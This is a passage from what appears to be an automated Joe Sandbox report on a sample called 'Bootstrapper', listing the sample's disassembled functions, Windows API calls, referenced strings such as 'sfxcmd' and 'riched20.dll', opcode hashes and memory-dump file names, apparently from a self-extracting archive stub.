String ID: (=$,<$,@$0?$0A$4B$8>$D=$DXGIDebug.dll$H?$H@$HA$P>$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=$`@$d?$dA$dwmapi.dll$h=$h>$kernel32$uxtheme.dll$|<$|?$|@$<$>$?$@$A
API String ID: 1207345701-31210346
Opcode ID: 6fb7dab059de4dd46e477319b1fb52dea915c493304c56b34e0bbd96f97326ad
Instruction ID: 687411e77542449606ba9360fc43cf917f5bf3b88a53b27fd5d72d2bc55de64f
Opcode Fuzzy Hash: 6fb7dab059de4dd46e477319b1fb52dea915c493304c56b34e0bbd96f97326ad
Instruction Fuzzy Hash: 0FD163B1108384AFD3259F61984EEDFBEE8BBC5704F50691DF185B6190C7B49688CFA2

Function 00E1C73F Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00E1C744

Part of subcall function 00E1B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00E1B3FB

Part of subcall function 00E1AF98: _wcschr.LIBVCRUNTIME ref: 00E1B033

_wcslen.LIBCMT ref: 00E1CA0A
_wcslen.LIBCMT ref: 00E1CA13
SetWindowTextW.USER32(?,?), ref: 00E1CA71
_wcslen.LIBCMT ref: 00E1CAB3
_wcsrchr.LIBVCRUNTIME ref: 00E1CBFB
GetDlgItem.USER32(?,00000066), ref: 00E1CC36
SetWindowTextW.USER32(00000000,?), ref: 00E1CC46
SendMessageW.USER32(00000000,00000143,00000000,00E4A472), ref: 00E1CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E1CC7F

Strings

ProgramFilesDir, xrefs: 00E1CB45
%s.%d.tmp, xrefs: 00E1C940
Software\Microsoft\Windows\CurrentVersion, xrefs: 00E1CB1A
<br>, xrefs: 00E1C9D4
<, xrefs: 00E1C909
, xrefs: 00E1CB24

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
String ID: %s.%d.tmp$<br>$<$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$
API String ID: 986293930-3467919732
Opcode ID: 5e21c84e07870ee747355b8b5262501dfb4f1a09b002f165b3c2bc55db932913
Instruction ID: 174875bd2b4fa52e9465c3a2eb61da419254b370e73f1040b4652b104cbce154
Opcode Fuzzy Hash: 5e21c84e07870ee747355b8b5262501dfb4f1a09b002f165b3c2bc55db932913
Instruction Fuzzy Hash: F5E161B2904218AADF24DBA0DC85EEE77BCAB04350F5454A6F649F3040EB749FC88F61

Function 00E0DA67 Relevance: 26.9, APIs: 5, Strings: 10, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00E0DA70
_wcschr.LIBVCRUNTIME ref: 00E0DA91
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00E0DAAC

Part of subcall function 00E0C29A: _wcslen.LIBCMT ref: 00E0C2A2

Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0

Part of subcall function 00E11B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E0BAE9,00000000,?,?,?,0001045E), ref: 00E11BA0

_wcslen.LIBCMT ref: 00E0DDE9
__fprintf_l.LIBCMT ref: 00E0DF1C

Strings

*messages***, xrefs: 00E0DBFA
,, xrefs: 00E0DF57
$%s:, xrefs: 00E0DEFF
RTL, xrefs: 00E0DEDE
, xrefs: 00E0DD6C
a, xrefs: 00E0DC16
*messages***, xrefs: 00E0DBC1
R, xrefs: 00E0DC0C
9, xrefs: 00E0DDD0
@%s:, xrefs: 00E0DF06, 00E0DF12

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9
API String ID: 557298264-1836506137
Opcode ID: 08ea8ce3a3fb4d03fb5b2a73ab078e88881e1231c77009fd58d2fd0f6a4369e4
Instruction ID: d86cfd8f441eb592a5afdf14c1bd464a941d6f68106b57c61b17ef50095e0d71
Opcode Fuzzy Hash: 08ea8ce3a3fb4d03fb5b2a73ab078e88881e1231c77009fd58d2fd0f6a4369e4
Instruction Fuzzy Hash: BE32DF71900218EBDB24EFA8CC46AEA77A5FF58304F40256AF905B72D1EBB19DC5CB50

Function 00E1D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E1B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
Part of subcall function 00E1B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
Part of subcall function 00E1B568: IsDialogMessageW.USER32(0001045E,?), ref: 00E1B59E
Part of subcall function 00E1B568: TranslateMessage.USER32(?), ref: 00E1B5AC
Part of subcall function 00E1B568: DispatchMessageW.USER32(?), ref: 00E1B5B6

GetDlgItem.USER32(00000068,00E5FCB8), ref: 00E1D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00E1AF07,00000001,?,?,00E1B7B9,00E3506C,00E5FCB8,00E5FCB8,00001000,00000000,00000000), ref: 00E1D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E1D51B
SendMessageW.USER32(00000000,000000C2,00000000,00E335F4), ref: 00E1D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E1D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E1D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E1D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E1D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00E343F4), ref: 00E1D5F0

Strings

\, xrefs: 00E1D549

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 848af1b2c500c614caf317192cfb3eafa4d6ab7cfd7be63c24d6a09b1df22c45
Instruction ID: d41994c5f5864de44355647c49674c7dd04e267fb192968ccf793a0d6efece4e
Opcode Fuzzy Hash: 848af1b2c500c614caf317192cfb3eafa4d6ab7cfd7be63c24d6a09b1df22c45
Instruction Fuzzy Hash: 6731BE75545342AFE301DF21AC4AFAB7FACEB82748F00050CFA51A61A1DBA49A0DC776

Function 00E1D78F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00E1D7AE
ShellExecuteExW.SHELL32(?), ref: 00E1D8DE
ShowWindow.USER32(?,00000000), ref: 00E1D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00E1D959
CloseHandle.KERNEL32(?), ref: 00E1D97F
ShowWindow.USER32(?,00000001), ref: 00E1D9E1

Strings

r, xrefs: 00E1D911
.inf, xrefs: 00E1D89A
.exe, xrefs: 00E1D989
PDu<, xrefs: 00E1D8DE
h, xrefs: 00E1D92E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf$PDu<$h$r
API String ID: 36480843-2155249188
Opcode ID: d1c689806e9340dfaab7e21e2b3f24c9e803e809b9f763c97d173073a5d7721d
Instruction ID: 24e49e1b0a86268e15319ed6e346fff098394038396f978b47fbe7b3f8ae9db7
Opcode Fuzzy Hash: d1c689806e9340dfaab7e21e2b3f24c9e803e809b9f763c97d173073a5d7721d
Instruction Fuzzy Hash: 6C51F37150C384AEDB309B25AC44BEBBBE5AF82748F04281DF5C1B7191E7B489C8CB52

Function 00E2A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E25695,00E25695,?,?,?,00E2ABAC,00000001,00000001,2DE85006), ref: 00E2A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E2ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00E2AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E2AB35
__freea.LIBCMT ref: 00E2AB42

Part of subcall function 00E28E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00E2CA2C,00000000,?,00E26CBE,?,00000008,?,00E291E0,?,?,?), ref: 00E28E38

__freea.LIBCMT ref: 00E2AB4B
__freea.LIBCMT ref: 00E2AB70

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d313d883fd143d46c10720a9ba09736c58141f0e990ef385764bfd9ddd5e57a9
Instruction ID: 11804753f79b56228be2b9eba47ddd64b006349c941f5e3f26146c356864b010
Opcode Fuzzy Hash: d313d883fd143d46c10720a9ba09736c58141f0e990ef385764bfd9ddd5e57a9
Instruction Fuzzy Hash: DB51E172A00226AFEB258F64EC41EABB7AAEF44714F19563DFC04F6140EB34DC40C692

Function 00E23B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00E23C35,?,?,00E62088,00000000,?,00E23D60,00000004,InitializeCriticalSectionEx,00E36394,InitializeCriticalSectionEx,00000000), ref: 00E23C03

Strings

api-ms-, xrefs: 00E23BC3

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bacb4b878f1ab2a11127c213bfb17ad6c6ad4612d176502ae350e5f08265780e
Instruction ID: ea440ac220cf7c247cea12ec38892b15383c6eddf07f7765c667c4b2d6995e4b
Opcode Fuzzy Hash: bacb4b878f1ab2a11127c213bfb17ad6c6ad4612d176502ae350e5f08265780e
Instruction Fuzzy Hash: D2110636A04234ABCB328F79AC45B5A7BA49F01774F211251F911FB2A0E778EF048ED0

Function 00E1AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E1081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E10836
Part of subcall function 00E1081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00E0F2D8,Crypt32.dll,00000000,00E0F35C,?,?,00E0F33E,?,?,?), ref: 00E10858

OleInitialize.OLE32(00000000), ref: 00E1AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00E1AC66
SHGetMalloc.SHELL32(00E48438), ref: 00E1AC70

Strings

3Ro, xrefs: 00E1AC47
riched20.dll, xrefs: 00E1AC1E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3Ro
API String ID: 3498096277-3613677438
Opcode ID: 7df5e8fa5e7d4f1b736d3e7fa6aad9b5f656d917f72431fcb11837a73f3f3705
Instruction ID: 9a2d09de80af7efe55b610a717bfe7bd5e1cfad1ba95ebc5463bba046017a92d
Opcode Fuzzy Hash: 7df5e8fa5e7d4f1b736d3e7fa6aad9b5f656d917f72431fcb11837a73f3f3705
Instruction Fuzzy Hash: 3DF0FFB1900209AFCB50AFAAD9499DFFFFCEF94740F004156E415B2241DBB456498BA1

Function 00E098E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00E07760,?,00000005,?,00000011), ref: 00E0995F
GetLastError.KERNEL32(?,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E0996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00E07760,?,00000005,?), ref: 00E099A2
GetLastError.KERNEL32(?,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E099AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00E07760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00E099F9

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 6ee3f87c0406e31b98b11aed1ad12ebaa12eed00430c252e544e33997e5d59cd
Instruction ID: 184a6ffafe50ed492e5f91ad542a939213cc3274b7a0a0bd4ecb3f51126e066e
Opcode Fuzzy Hash: 6ee3f87c0406e31b98b11aed1ad12ebaa12eed00430c252e544e33997e5d59cd
Instruction Fuzzy Hash: 903113305443456FE7309F24CC4ABDABBD4BB84324F501B19F9E1A61D3D3A4A9C8CB91

Function 00E1B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1B58A
IsDialogMessageW.USER32(0001045E,?), ref: 00E1B59E
TranslateMessage.USER32(?), ref: 00E1B5AC
DispatchMessageW.USER32(?), ref: 00E1B5B6

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 933777c322a7c68383917476257cfd1dd9555747536e18cce9cc8d2ea5398ba7
Instruction ID: 5a52916d3527be2c59bf060401b7b7bc9a9f41ad47565b6a6e4a2aa437f42ab8
Opcode Fuzzy Hash: 933777c322a7c68383917476257cfd1dd9555747536e18cce9cc8d2ea5398ba7
Instruction Fuzzy Hash: 86F0B771A0122AAF8B20ABF6AD4CDDB7FADEF062957004415F919E2010EB74D64DCBB0

Function 00E1ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00E1ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00E1ABF9

Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00E1ABE9

Strings

EDIT, xrefs: 00E1ABCD, 00E1ABD8, 00E1ABE5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 63d321086c0ea8525346fa107c9d82a2338199559efed79efcc6d7cdc1a7c595
Instruction ID: 22d3c91cb6a9df5b62f8935e52b4b0854e4949087ab9524d3b590ea47b6488d6
Opcode Fuzzy Hash: 63d321086c0ea8525346fa107c9d82a2338199559efed79efcc6d7cdc1a7c595
Instruction Fuzzy Hash: B8F082327012287ADB205625AC09FEB76AC9F46B40F485062FA05B21C0D7A0EA8985B6

Function 00E1DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E1DBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E1DC30

Strings

sfxcmd, xrefs: 00E1DBEF
sfxpar, xrefs: 00E1DC2B

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 65b598635453dbf24de7b545792e54a308330420bc418626fab67eb930e6052c
Instruction ID: e0fdcfa3f093b0176ed6269aa8af0a294ba4a28220c7e7c9586d959544d3f7e3
Opcode Fuzzy Hash: 65b598635453dbf24de7b545792e54a308330420bc418626fab67eb930e6052c
Instruction Fuzzy Hash: B4F0A7B2405228AACB202B958C0AFFA7B98AF04781B041811BD85B5151D6F489C0D6E0

Function 00E09785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00E09795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E097AD
GetLastError.KERNEL32 ref: 00E097DF
GetLastError.KERNEL32 ref: 00E097FE

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 86b23a795dc3515cf6c1c3a1c0818bc49a55f11b08bfa61a2bece47b7b2a2a06
Instruction ID: 41aee71baa53f36914a404624b4c64e55c66ca3c59abd33f3740cd7965693e3c
Opcode Fuzzy Hash: 86b23a795dc3515cf6c1c3a1c0818bc49a55f11b08bfa61a2bece47b7b2a2a06
Instruction Fuzzy Hash: CE11C232910204EBCF245F75C804AA93BA9FB42324F10D62AF456B52D3D7748EC4DB61

Function 00E2AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E23F73,00000000,00000000,?,00E2ACDB,00E23F73,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue), ref: 00E2AD66
GetLastError.KERNEL32(?,00E2ACDB,00E23F73,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue,00E37970,FlsSetValue,00000000,00000364,?,00E298B7), ref: 00E2AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E2ACDB,00E23F73,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue,00E37970,FlsSetValue,00000000), ref: 00E2AD80

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: df347b2add02bc7f331d78dc802c422da9fa60ab0949ac4006b5f00c2fbe1c9f
Instruction ID: 3deb57d75613cfe8c223ef9f54e3f146011026130a3a313ce0f3051366c66af4
Opcode Fuzzy Hash: df347b2add02bc7f331d78dc802c422da9fa60ab0949ac4006b5f00c2fbe1c9f
Instruction Fuzzy Hash: 1501D43620123AAFC7314F79BC48E977F98AF457AB7191630F906F7560D720D8058AE1

Function 00E2BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00E297E5: GetLastError.KERNEL32(?,00E41030,00E24674,00E41030,?,?,00E23F73,00000050,?,00E41030,00000200), ref: 00E297E9
